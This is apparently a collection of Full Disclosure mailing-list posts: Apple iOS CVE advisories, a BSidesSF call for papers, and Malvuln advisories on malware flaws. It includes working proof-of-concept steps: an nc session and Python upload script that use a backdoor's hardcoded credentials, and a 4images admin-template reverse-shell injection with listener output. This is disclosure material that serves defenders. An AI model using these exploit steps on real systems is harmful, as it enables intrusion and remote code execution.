-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2022-12-13-3 iOS 16.1.2 iOS 16.1.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213516. WebKit Available for: iPhone 8 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1. Description: A type confusion issue was addressed with improved state handling. WebKit Bugzilla: 248266 CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "iOS 16.1.2". All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFYEACgkQ4RjMIDke Nxll4hAAolqnH+W3gE3w2Xri3wUchwkj6WPhfWcwwc+l0cxUxiDqzhGSkW4kNTVI eCjENaJ4WfsK7COfxx8qnmQtcqV8P406XtDomeE96Rm/euCEzkSpVPSs4S8+YwvO qRNWVbWmWQ1gKFSqkuZb2Y5IAnA+KI3Fw1M1iq8Cbs/bkUVjNfrIrrPgl19BercE Ojsjq+BQS15dIq84GUiSv/KTU31NKMeSQLB8O9+u91tuBex2b+1mdwb15K1R17OI e/exVA2qnQFctfhWu2uh2izckATylQjtvQHMr0pAwdEoLyRl1xXrW62DeVwWBsn0 bxUhjSfS/clmXyN/hL1ocgUrHrI9yAVST5oug/LqR8RjTkgTBcGF9C0YMXaexvA0 y2AhF70pl67UESleBSRddayFAW2lZkV/YdJosxGLsRviy8jdiiQ4VJ5xI9TAECbU GgF2qHVSz4gnlyyDUfUqHUmjLej48qCMbadY4IQQmvW30yiCW+shHfaLzCBYZ2cL hUCD7IqU7C1+KE+bJ1Y/k7EXOkLWhZ9go7kKUF6OfpVd6OPIYd4R38eghUXU4Zvi QwYQlkXm1Q+DZrwaOvMf0kMkCA/10ktuzhKSpiCI/47BqcE8VYi0CCbOUaSZSPi6 P0jlpuIsxCd1UKkGaTsfdJIyeNY1VPHkiOl2BYpIelCqqhOiNHc= =wMpD -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2022-12-13-2 iOS 15.7.2 and iPadOS 15.7.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2022-12-13-2 iOS 15.7.2 and iPadOS 15.7.2 iOS 15.7.2 and iPadOS 15.7.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213531. AppleAVD Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Parsing a maliciously crafted video file may lead to kernel code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46694: Andrey Labunets and Nikita Tarakanov AVEVideoEncoder Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An app may be able to execute arbitrary code with kernel privileges Description: A logic issue was addressed with improved checks. CVE-2022-42848: ABC Research s.r.o File System Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An app may be able to break out of its sandbox Description: This issue was addressed with improved checks. CVE-2022-42861: pattern-f (@pattern_F_) of Ant Security Light-Year Lab Graphics Driver Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Parsing a maliciously crafted video file may lead to unexpected system termination Description: The issue was addressed with improved memory handling. CVE-2022-42846: Willy R. Vasquez of The University of Texas at Austin IOHIDFamily Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2022-42864: Tommy Muir (@Muirey03) iTunes Store Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation. CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security Kernel Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with additional validation. CVE-2022-46689: Ian Beer of Google Project Zero libxml2 Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An integer overflow was addressed through improved input validation. CVE-2022-40303: Maddie Stone of Google Project Zero libxml2 Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: This issue was addressed with improved checks. CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero ppp Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42840: an anonymous researcher Preferences Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An app may be able to use arbitrary entitlements Description: A
[FD] APPLE-SA-2022-12-13-1 iOS 16.2 and iPadOS 16.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2022-12-13-1 iOS 16.2 and iPadOS 16.2 iOS 16.2 and iPadOS 16.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213530. Accounts Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: A user may be able to view sensitive user information Description: This issue was addressed with improved data protection. CVE-2022-42843: Mickey Jin (@patch1t) AppleAVD Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: Parsing a maliciously crafted video file may lead to kernel code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46694: Andrey Labunets and Nikita Tarakanov AppleMobileFileIntegrity Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: An app may be able to bypass Privacy preferences Description: This issue was addressed by enabling hardened runtime. CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing AVEVideoEncoder Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A logic issue was addressed with improved checks. CVE-2022-42848: ABC Research s.r.o CoreServices Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: An app may be able to bypass Privacy preferences Description: Multiple issues were addressed by removing the vulnerable code. CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security GPU Drivers Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: An app may be able to disclose kernel memory Description: The issue was addressed with improved memory handling. CVE-2022-46702: Xia0o0o0o of W4terDr0p, Sun Yat-sen University Graphics Driver Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42850: Willy R. Vasquez of The University of Texas at Austin Graphics Driver Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: Parsing a maliciously crafted video file may lead to unexpected system termination Description: The issue was addressed with improved memory handling. CVE-2022-42846: Willy R. Vasquez of The University of Texas at Austin ImageIO Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46693: Mickey Jin (@patch1t) ImageIO Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: Parsing a maliciously crafted TIFF file may lead to disclosure of user information Description: The issue was addressed with improved memory handling. CVE-2022-42851: Mickey Jin (@patch1t) IOHIDFamily Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2022-42864: Tommy Muir (@Muirey03) IOMobileFrameBuffer Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46690: John Aakerblom (@jaakerblom) iTunes Store Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Impact: A remote user may be able to
[FD] Adversary3 updated / Malware vulnerability intel tool for third-party attackers
The Adversary3 project has been updated, added a new vulnerability category "Logic Flaw" and dozens of new malware vulnerabilities. https://github.com/malvuln/Adversary3 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Ransom.Win64.AtomSilo / Crypto Logic Flaw
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/5559e9f5e1645f8554ea020a29a5a3ee.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Backup media: infosec.exchange/@malvuln Threat: Ransom.Win64.AtomSilo Vulnerability: Crypto Logic Flaw Family: AtomSilo Type: PE64 MD5: 5559e9f5e1645f8554ea020a29a5a3ee Vuln ID: MVID-2022-0666 Disclosure: 12/14/2022 Description: AtomSilo ransomware FAILS to encrypt non PE files that have a ".exe" in the filename. Creating specially crafted file names successfully evaded encryption for this malware sample. E.g. Test.exe.docx Test.exe.pdf Tested successfully in a virtual machine environment. PoC Video: https://www.youtube.com/watch?v=xyBt9Ppb-xc Exploit/PoC: Create files with ".exe" within the filename. Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Backdoor.Win32.InCommander.17.b / Hardcoded Cleartext Credentials
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source:
https://malvuln.com/advisory/dd76d8a5874bf8bf05279e35c68449ca.txt
Contact: malvul...@gmail.com
Media: twitter.com/malvuln
Backup media: infosec.exchange/@malvuln
Threat: Backdoor.Win32.InCommander.17.b
Vulnerability: Hardcoded Cleartext Credentials
Family: InCommander
Type: PE32
MD5: dd76d8a5874bf8bf05279e35c68449ca
Vuln ID: MVID-2022-0665
Dropped files: incsrv.exe
Disclosure: 12/14/2022
Description: The malware listens on TCP port 9400 and 9401 and requires
authentication. However, the username "IncUser-b3" is stored in cleartext
in a file named "incsrv.drv" under Windows dir. The password
"InClientMainPassword" is also stored in cleartext but within the PE file
"incsrv.exe" at offset 000958d0.
Third-party adversaries may then upload thier own executables using ftp
PASV, STOR commands.
Exploit/PoC:
C:\>nc64.exe 192.168.18.125 9401
220 InCommad FTP Server ready.
USER IncUser-b3
331 Password required for IncUser-b3.
PASS InClientMainPassword
230 User IncUser-b3 logged in.
SYST
215 UNIX Type: L8 Internet Component Suite
PASV
227 Entering Passive Mode (192,168,18,125,241,155).
CDUP \
250 CWD command successful. "C:/" is current directory.
STOR DOOM_SM.exe
150 Opening data connection for DOOM_SM.exe.
226 File received ok
from socket import *
MALWARE_HOST="192.168.18.125"
PORT=61851
DOOM="DOOM_SM.exe"
def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
f = open(DOOM, "rb")
EXE = f.read()
s.send(EXE)
while EXE:
s.send(EXE)
EXE=f.read()
s.close()
print("By Malvuln");
if __name__=="__main__":
doit()
Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] [CFP] BSides San Francisco – April 2023
BSidesSF is soliciting presentations, workshops, and villages for the 2023 annual BSidesSF conference. Presentations: https://bsidessf.org/cfp Workshops: https://bsidessf.org/cfp/workshops Villages: https://bsidessf.org/cfp/villages ** Topics ** All topic areas related to reliability, application security, web security, network security, privacy, cryptography, and information security are of interest and in scope. Let us help you get the word out on The Next Big Thing! ** Theme ** Space: Putting the Cyber in Space!, to commemorate the new James Webb Space Telescope while paying homage to "cyberspace". ** Submission ** Presentations: https://bsidessf.org/cfp Workshops: https://bsidessf.org/cfp/workshops Villages: https://bsidessf.org/cfp/villages ** Dates and Deadlines ** January 8, 2023 – Final due date for all submissions, rolling notifications begin January 22, 2023 – All notifications, including waitlist, sent February 7, 2023 – Participation confirmed by presenters and details finalized April 22-23, 2023 - BSidesSF 2023 ** Location ** BSidesSF will be located at City View at the Metreon in downtown San Francisco. ** Thanks! Security BSides San Francisco https://bsidessf.org prog...@bsidessf.org https://twitter.com/BSidesSF ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] 4images RCE
# Exploit Title: 4images 1.9 - Remote Command Execution # Exploit Author: Andrey Stoykov # Software Link: https://www.4homepages.de/download-4images # Version: 1.9 # Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme" 3. Select Template "categories.html" 4. Paste reverse shell code 5. Click "Save Changes" 6. Browse to "http://host/4images/categories.php?cat_id=1; // HTTP POST request showing reverse shell payload POST /4images/admin/templates.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] __csrf=c39b7dea0ff15442681362d2a583c7a9=savetemplate=[REVERSE_SHELL_CODE]_file_name=categories.html_folder=default_960px[...] // HTTP redirect response to specific template GET /4images/categories.php?cat_id=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] # nc -kvlp listening on [any] ... connect to [127.0.0.1] from localhost [127.0.0.1] 43032 Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux 13:54:28 up 2:18, 2 users, load average: 0.09, 0.68, 0.56 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT kali tty7 :0 11:582:18m 2:21 0.48s xfce4-session kali pts/1-11:581:40 24.60s 0.14s sudo su uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off $ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
